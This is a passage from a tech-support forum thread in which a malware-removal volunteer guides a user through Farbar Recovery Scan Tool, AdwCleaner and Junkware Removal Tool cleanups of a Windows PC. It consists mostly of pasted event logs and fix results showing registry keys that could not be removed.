Description: application-specificLocalActivationCortanaUI.AppXn73w0hsq3g4wx1h9fhf7q02vw2wta6qc.mcaUnavailableBasement-pcsesayS-1-5-21-1436452318-2580999886-2786755032-1003LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:24:56 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:18:55 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (01/31/2016 07:13:44 PM) (Source: DCOM) (EventID: 10016) (User: Basement-pc)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}Basement-pcabangS-1-5-21-1436452318-2580999886-2786755032-1002LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-01-29 16:59:04.910
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-15 21:53:53.600
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-14 08:38:24.870
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-10 22:59:22.198
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-01-10 15:05:37.248
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-30 10:14:59.529
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-26 12:19:01.409
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-24 18:54:58.990
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-20 03:34:44.397
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-12-15 21:24:22.269
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3-4160T CPU @ 3.10GHz
Percentage of memory in use: 49%
Total physical RAM: 8117.75 MB
Available physical RAM: 4098.66 MB
Total Virtual: 10805.75 MB
Available Virtual: 5892.49 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:910.99 GB) (Free:844.58 GB) NTFS
Drive d: (Recovery Image) (Fixed) (Total:18.61 GB) (Free:2.33 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 09151085)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 

Attached Files



#6 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 31 January 2016 - 09:03 PM

Thanks for the information. I am not sure this is a malware issue but we will poke around a bit.

Does this only happen when gaming?

Please do this.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

AdwCleaner by Xplode - Delete Adware

-------------------
  • Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browser
  • Double click on AdwCleaner.exe, click Run, then select I agree if it appears
  • Click Scan
  • Once the scan has completed youi will see Pending. Please check elements you don't want to remove above the progress bar
  • Click on Clean
  • Confirm the cleaning and rebooting of your computer by clicking OK
  • Your computer will be rebooted automatically. A text file will open after the restart
  • Copy and paste the contents in your reply
  • You can also find the logfile at C:\AdwCleaner\AdwCleaner.txt
===================================================

Junkware Removal Tool

-------------------
  • Please download Junkware Removal Tool and save it to your desktop.
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Right-mouse click JRT.exe and select Run as administrator (Windows XP double click the icon)
  • Please allow the program time to run
  • Once completed a Notepad document will open on your desktop
  • Copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • AdwCleaner log
  • Junkware log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#7 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 31 January 2016 - 10:11 PM

Yeah that's what I figured when he explained the problem to me.

I didn't think it was a malware issue. Rather I think it's a problem with the software.

I will do these tasks tomorrow. 



#8 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 31 January 2016 - 10:18 PM

:thumbsup2:
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#9 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 02 February 2016 - 07:35 PM

I saved my jrt.txt log in my desktop but it I couldn't find it. I don't know what happened to it.

I copy and paste the other 2 content files.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by sesay (2016-02-02 18:41:37) Run:2
Running from C:\Users\sesay\Desktop
Loaded Profiles: sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key could not remove. Access Denied.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found. 
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key could not remove. Access Denied.
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key could not remove. Access Denied.
Could not move "C:\WINDOWS\System32\Tasks\gameo_update" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key could not remove. Access Denied.
C:\Users\sesay\AppData\Roaming\Gameo => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4} => key could not remove. Access Denied.
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => key could not remove. Access Denied.
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by sesay (2016-02-02 18:41:37) Run:2
Running from C:\Users\sesay\Desktop
Loaded Profiles: sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key could not remove. Access Denied.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key could not remove. Access Denied.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSynced => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtSyncing => key could not remove. Access Denied.
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found. 
C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe => not found.
C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe => not found.
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key could not remove. Access Denied.
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04C31380-2799-493E-A3C0-05D5EE7729AC} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09E882AD-8DCF-47DC-B2B7-933BAA9151D6} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3487E524-CC1E-40C1-A28C-FFB73CFCACC5} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{949DE924-F62B-451E-BEF7-D4FA0E42D772} => key could not remove. Access Denied.
Could not move "C:\WINDOWS\System32\Tasks\gameo_update" => Scheduled to move on reboot.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gameo_update => key could not remove. Access Denied.
C:\Users\sesay\AppData\Roaming\Gameo => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFB6070B-F7D4-4F4A-862C-E18D88730BF4} => key could not remove. Access Denied.
C:\WINDOWS\System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => key could not remove. Access Denied.
 
 


#10 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 02 February 2016 - 08:32 PM

Please run the fix again but this time when you launch FRST right click on the icon and select Run as administrator. Post the results.

Do you have the AdwCleaner log? You posted the Fixlog twice.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#11 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 05 February 2016 - 07:35 PM

Greetings,

===================================================

3 Day Bump

It has been more than 3 days since my last post.
  • Do you still need help with this?
  • If after 48hrs you have not replied to this thread then it will have to be closed.

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#12 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 05 February 2016 - 10:44 PM

Fix result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by MuhammadAkim (2016-02-05 22:23:34) Run:3
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
C:\Users\sesay\AppData\Roaming\Gameo
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179}
*****************
 
Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\###MegaShellExtPending" => key removed successfully
